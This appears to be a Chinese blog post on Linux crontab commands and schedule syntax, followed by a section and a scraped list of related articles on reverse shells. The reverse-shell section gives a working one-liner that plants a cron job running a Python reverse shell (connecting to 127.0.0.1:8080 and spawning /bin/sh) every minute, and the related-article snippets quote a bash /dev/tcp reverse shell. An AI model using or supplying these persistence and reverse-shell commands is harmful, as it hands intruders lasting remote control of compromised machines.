crontab命令使用记录(精,反弹shell)
1. 编辑定时任务
crontab -e
linux通用路径:/etc/crontab
ubuntu被编辑的文件路径一般为:/var/spool/cron/crontabs/当前用户
centos被编辑的文件路径一般为:/var/spool/cron/当前用户
2. 删除定时任务(情况)
crontab -r
3. 查看现有定时任务
crontab -l
4. crountab 定时任务规则编写
*/5 * * * * Command 每5分钟执行一次命令5 * * * * Command 每小时的第5分钟执行一次命令
30 18 * * * Command 指定每天下午的 6:30 执行一次命令
30 7 8 * * Command 指定每月8号的7:30分执行一次命令
30 5 8 6 * Command 指定每年的6月8日5:30执行一次命令
30 6 * * 0 Command 指定每星期日的6:30执行一次命令
5. 反弹shell
可能大家平时比较少人ubuntu,所以不大知道这个特性
测试结果:
/etc/crontab和/var/spool/cron/crontabs/,bash -i反弹shell都失败。不过python,perl可以,centos和ubuntu都自带python,perl。
Python
执行以下命令,以当前bash权限用户,创建一个crontab文件
(crontab -l;printf " * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'n")|crontab -
代码说明:
crontab -将管道符前面的内容写入到当前用户的crontab文件里
- 表示每一分钟执行该命令,等同于/1 *
如果是ubuntu的root权限,以上命令会写到/var/spool/cron/crontabs/root文件
如果是centos的root权限,以上命令会写到/var/spool/cron/root, 执行成功后,相应的crontab文件会创建或者追加如下内容
* * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Bash
crontab命令使用记录(精,反弹shell)相关推荐
- linux nc反弹命令,详解NC反弹shell的几种方法
假如ubuntu.centos为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu.centos的shell反弹到kali上 正向 ...
- 反弹shell bash -i命令
目录 0x01 什么是反弹shell? 0x02 命令拆分详解 0x03 文件描述符 0x04 shell 输入/输出重定向 0x05 输入输出结合获得shell 什么是反弹she ...
- 反弹shell和键盘记录器实现
环境:win10(测试机),阿里云服务器(服务端) 另附:从局域网监控到广域网实时监控的实现 反弹shell(reverse shell),就是控制端监听在某 TCP/UDP 端口,被控端 ...
- 常用的一句话反弹shell总结
目录 常用的一句话反弹shell总结 1. bash直接反弹 2. python一句话反弹shell 3. python脚本反弹shell 4. php一句话反弹shell 5. php脚本反弹she ...
- centos7输入shell找不到命令_反弹shell原理与实现
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端.reverse shell与tel ...
- Windows nc命令下载使用与使用bash建立反弹shell
今天继续给大家介绍渗透测试相关知识,本文主要内容是Windows nc命令下载使用与使用bash建立反弹shell. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造 ...
- bulldog-1靶机 write up 源码 MD5解密得到密码到后台 命令执行绕过 反弹shell string分析文件得到密码提权
bulldog-1靶机 write up 0x00 环境搭建 0x01 信息收集 0x02 漏洞挖掘 web漏洞思路 ssh 利用思路 步骤一:浏览网页 爆破目录 步骤二: 破解hash 步骤三:利用 ...
- 反弹Shell命令一键生成工具
工具下载方式:反弹Shell命令一键生成工具https://mp.weixin.qq.com/s/ckUvd6Ayw27TLJ5GH1bZ6A
- php 端口反弹,详解反弹shell命令
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势: bash -i >& /dev/tcp/ip/port 0>&1 bash -i ...
最新文章
- c语言程序设计A课程试,自学考试有关论文范文,与C语言程序设计A课程辅导相关硕士毕业论文范文...
- 极速搭建一个个人博客网站
- python 列表、字典多排序问题
- ENSP配置 实例二 单臂路由配置
- 这个 Python 代码自动补全神器搞得我卧槽卧槽的
- linux该专接本还是工作_2020河北专接本报考录取比例相差最大专业TOP榜,出乎意料吗?...
- C语言丨定积分的近似计算
- SQL Server 2008 评估期已过解决方法
- 惠斯通电桥信号调理芯片_变频器通电后无反应,如何检查维修?
- android报错自动重启,Android Studio常见报错及处理办法
- c语言程序设计全文阅读,C语言程序设计(谭浩强).doc
- linux创建2g文件,嵌入式 创建一个2G的空文件(Linux命令dd)
- 计算机英语潘雪峰,《小学三年级英语听力训练指导策略的研究》研究报告
- jsp内置对象request
- POJ 3744 Scout YYF I:概率dp
- c语言 2个字节字符串,【单选题】在C语言中,字符型数据所占的内存空间是
A. 2 个字节
B. 4 个字节
C. 1 个字节
D. 由用户自定义...
- Linux ARM平台开发系列讲解(摄像头V4L2子系统) 2.12.4 V4L2子设备操作函数结构体分析
- 通达信缠论顶底分型选股公式(一笔优化版)
- spss和python哪个好用_数据分析5大软件PK,你最爱哪个?
- GoLang之使用sync.Cond
热门文章
- Linux学习 - sed使用
- 亲测有效!解决macOS Big Sur系统Parallels Desktop 16的USB无法使用和无法联网问题
- APP、智能设备、平台账号等信息系统,实现无密码登录的可行性方案。
- java断言错误_java-获取断言错误,即使期望值和实际值相同
- swing中怎么在原来图片的基础上切换第二张图片_摄影比赛原来是这么评出来的!照片点评与修图小赛第10期...
- Js获取字符串的显示宽度/高度
- Node.js笔记-使用nodejs-websocket构建WebSocket服务
- C++设计模式-组合模式
- STL|QTL工作笔记-QString与std::string寻找子串的区别与联系
- Qt实现全屏下玫瑰花(含详细注释)